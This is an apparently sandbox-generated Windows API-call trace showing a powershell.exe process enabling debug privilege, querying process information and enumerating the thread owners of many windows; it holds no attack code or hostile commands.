	[0476.496] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x0, puLen=0x12db80) returned 0
	[0476.496] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x0, puLen=0x12db80) returned 0
	[0476.496] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2cc733c, puLen=0x12db50) returned 1
	[0476.497] CoTaskMemAlloc (cb=0x204) returned 0x301c30
	[0476.497] VerLanguageNameW (in: wLang=0x0, szLang=0x301c30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0476.498] CoTaskMemFree (pv=0x301c30) 
	[0476.498] VerQueryValueW (in: pBlock=0x2cc72a0, lpSubBlock="\\", lplpBuffer=0x12dba8, puLen=0x12dba0 | out: lplpBuffer=0x12dba8*=0x2cc72c8, puLen=0x12dba0) returned 1
	[0476.504] GetCurrentProcessId () returned 0xf64
	[0477.174] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cad0 | out: lpLuid=0x12cad0*(LowPart=0x14, HighPart=0)) returned 1
	[0477.177] GetCurrentProcess () returned 0xffffffffffffffff
	[0477.178] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12caf0 | out: TokenHandle=0x12caf0*=0x2f0) returned 1
	[0477.179] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2ccab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0477.180] CloseHandle (hObject=0x2f0) returned 1
	[0477.184] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f0
	[0477.786] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2ccab80, cb=0x200, lpcbNeeded=0x12db08 | out: lphModule=0x2ccab80, lpcbNeeded=0x12db08) returned 1
	[0477.788] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f370000, lpmodinfo=0x2ccadf0, cb=0x18 | out: lpmodinfo=0x2ccadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0477.789] CoTaskMemAlloc (cb=0x804) returned 0x3688a0
	[0477.789] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f370000, lpBaseName=0x3688a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0477.790] CoTaskMemFree (pv=0x3688a0) 
	[0477.790] CoTaskMemAlloc (cb=0x804) returned 0x3688a0
	[0477.790] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f370000, lpFilename=0x3688a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0477.791] CoTaskMemFree (pv=0x3688a0) 
	[0477.791] CloseHandle (hObject=0x2f0) returned 1
	[0477.799] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x2f0
	[0477.800] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x12dc38 | out: lpExitCode=0x12dc38*=0x103) returned 1
	[0477.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb088, Length=0x20000, ResultLength=0x12dc00 | out: SystemInformation=0x12ccb088, ResultLength=0x12dc00*=0x2d700) returned 0xc0000004
	[0477.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb0b8, Length=0x2ff00, ResultLength=0x12dc00 | out: SystemInformation=0x12ceb0b8, ResultLength=0x12dc00*=0x2d700) returned 0x0
	[0477.823] EnumWindows (lpEnumFunc=0x2b566ac, lParam=0x0) returned 1
	[0479.002] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.002] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x558
	[0479.002] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x538
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x778
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x778
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.003] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x460
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.004] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10b4
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10ac
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10ec
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1068
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x17e0
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x102c
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x17a4
	[0479.005] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1050
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1694
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1770
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1720
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x165c
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1578
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x16c0
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x161c
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1638
	[0479.006] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x15c8
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1554
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1674
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1520
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x14bc
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xf8c
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe9c
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1434
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x14ec
	[0479.007] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xfcc
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x12ac
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1484
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x934
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc0c
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb08
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x948
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1178
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13e0
	[0479.008] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xcd0
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13fc
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xdc8
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc18
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc2c
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa1c
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1244
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xdb0
	[0479.009] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1398
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1358
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1370
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1340
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x130c
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x12c0
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x12e4
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1270
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1298
	[0479.010] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x120c
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x122c
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x11c4
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x11b0
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1188
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1148
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1160
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10fc
	[0479.011] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe34
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xea4
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x514
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe48
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xbc8
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xdf8
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x318
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xcac
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x8bc
	[0479.012] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xf9c
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xf48
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe40
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xecc
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xeb8
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe80
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe98
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe60
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xee4
	[0479.013] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xf00
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xdf0
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe1c
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xdd0
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xd94
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xd74
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xd00
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xcd8
	[0479.014] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc84
	[0479.015] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xca4
	[0479.015] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc64
	[0479.015] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc24
	[0479.015] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb84
	[0479.015] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xbac
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x384
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xab8
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x33c
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa44
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa64
	[0479.016] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x8a8
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xaf0
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x88c
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb04
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x910
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x230
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xac0
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xab4
	[0479.017] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xaac
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x3d0
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x978
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa7c
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x59c
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa88
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa6c
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa68
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x9f8
	[0479.018] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa04
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x924
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x8dc
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x7dc
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x768
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x764
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x820
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x810
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x794
	[0479.019] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x83c
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x7ac
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb44
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb5c
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x838
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.020] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x818
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x5b8
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x494
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1ec
	[0479.021] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x440
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x7e8
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x730
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x2c8
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x31c
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x330
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x128
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x5c8
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x6f8
	[0479.022] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x358
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x73c
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xb0
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x250
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x240
